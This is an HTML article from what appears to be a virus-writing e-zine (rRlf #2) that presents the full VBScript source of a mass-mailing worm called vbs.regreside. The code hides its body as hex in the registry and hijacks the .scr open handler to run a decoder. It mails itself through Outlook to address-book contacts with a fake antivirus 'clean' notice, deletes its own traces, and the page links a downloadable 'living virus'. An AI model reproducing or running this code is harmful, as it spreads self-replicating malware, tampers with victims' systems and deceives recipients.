<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="02.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="04.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>vbs.regreside by alcopaul</u></b>
<p>=============================================================================================================================
<br>VBS_REGRESIDE.A
=============================================================================================================================
<br>I was reading a 29a #6 article by litesys (Multipartite PE/DOC viruses tute) and I stumbled on a routine...
<p>Excerpt:
<p>For o = 1 to Len(joda) Step 2
<br>X = X + Chr("&h" + Mid(Joda, o, 2))
<br>Next
<p>Then i started to think of a good use of this simple routine....
<br>And i succeeded.. :)
<p>Presenting.. 
<p>vbs.regreside...
<p>Since I didn't encounter any viruses which store its "meat" in the registry, I'll declare this as first...
<p>=====================================
<br>on error resume next
<br>Dim fso, a, b, X, o, g, e
<br>Set fso = CreateObject("Scripting.FileSystemObject")
<br>set a = fso.OpenTextFile(Wscript.ScriptFullname, 1)
<br>b = a.ReadAll
<br>set h = fso.CreateTextFile("c:\freemp3s.vbs", True) '::: spawn the attachment
<br>h.Write b
<br>h.Close
<br>For o = 1 to Len(b) '::: convert the virus body to hex rep...
<br>X = X & Hex(Asc(Mid(b, o, 1)))
<br>Next
<br>set g = CreateObject("Wscript.Shell")
<br>g.regwrite "HKEY_LOCAL_MACHINE\Alcopaul", X '::: store the meat to registry :)
<br>g.regwrite "HKEY_CLASSES_ROOT\scrfile\shell\open\command\", "wscript.exe c:\excel.vbs" '::: anotha hook... for the decoder
<br>mail() ':::worming
<br>decoder = "on error resume next" & vbcrlf & _ '::: spawn the decoder.\
<br>"dim e, y, z, data" & vbcrlf & _
<br>"e = fromreg(""HKEY_LOCAL_MACHINE\Alcopaul"")" & vbcrlf & _
<br>"function fromreg(gg)" & vbcrlf & _
<br>"Set regedit = CreateObject(""WScript.Shell"")" & vbcrlf & _
<br>"fromreg = regedit.regread(gg)" & vbcrlf & _
<br>"end function" & vbcrlf & _
<br>"For y = 1 to Len(e) Step 2" & vbcrlf & _ ':::thankie to litesys
<br>"z = z & Chr(""&h"" + Mid(e, y, 2))" & vbcrlf & _
<br>"next" & vbcrlf & _ ':::end of thankie
<br>"data = replace(z, Chr(""&hDA""), vbcrlf)" & vbcrlf & _ ':::converting hex rep to chr will produce some impurities..clean..
<br>"Set fso = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf & _
<br>"set h = fso.CreateTextFile(""c:\registry.vbs"", True)" & vbcrlf & _
<br>"h.Write data" & vbcrlf & _
<br>"h.Close" & vbcrlf & _
<br>"Set fsa = CreateObject(""Wscript.Shell"")" & vbcrlf & _
<br>"fsa.Run(""c:\registry.vbs"")" & vbcrlf & _
<br>"msgbox ""Checking registry values"", ,""Scanreg""" & vbcrlf & _ ':::msgbox so registry.vbs won't be promptly deleted
<br>"fso.deletefile(""c:\registry.vbs"")"
<br>set j = fso.CreateTextFile("c:\excel.vbs", True) ':::the decoder
<br>j.write decoder
<br>j.close
<br>fso.deletefile(wscript.scriptfullname) ':::dump traces
<br>sub mail() '::: mailing time
<br>on error resume next
<br>Set a = CreateObject("Outlook.Application")
<br>Set b = a.GetNameSpace("MAPI")
<br>If a = "Outlook" Then
<br>b.Logon "profile", "password"
<br>For y = 1 To b.AddressLists.Count
<br>Set d = b.AddressLists(y)
<br>x = 1
<br>Set c = a.CreateItem(0)
<br>For oo = 1 To d.AddressEntries.Count
<br>e = d.AddressEntries(x)
<br>c.Recipients.Add e
<br>x = x + 1
<br>If x > 101 Then oo = d.AddressEntries.Count
<br>Next
<br>c.Subject = "Free Access To Thousands Of MP3"
<br>c.Body = "-------------- Trend Micro Online Scanner ----------------" & vbcrlf & _ ':::fake scanner report..
<br>"The attached file doesn't contain any malicious routines" & vbcrlf & _
<br>"-------------------------------------------------------------------" & vbcrlf & _
<br>""
<br>c.attachments.Add("c:\freemp3s.vbs")
<br>c.Send
<br>c.DeleteAfterSubmit = True
<br>e = ""
<br>Next
<br>b.Logoff
<br>End If
<br>Set fso = CreateObject("Scripting.FileSystemObject")
<br>fso.deletefile("c:\freemp3s.vbs") ':::dump traces 2
<br>end sub
<br>'by alcopaul '::: vb man in action
<br>'vbs.rEgResIDe '::: christened by me
<br>=====================================================
<p>Proof of a concept? Nah... but creative....
<p>alcopaul
<br>03/28/2k2
<br>[rrlf]
<p><a href="03.zip">living virus</a>
</body>
</html>
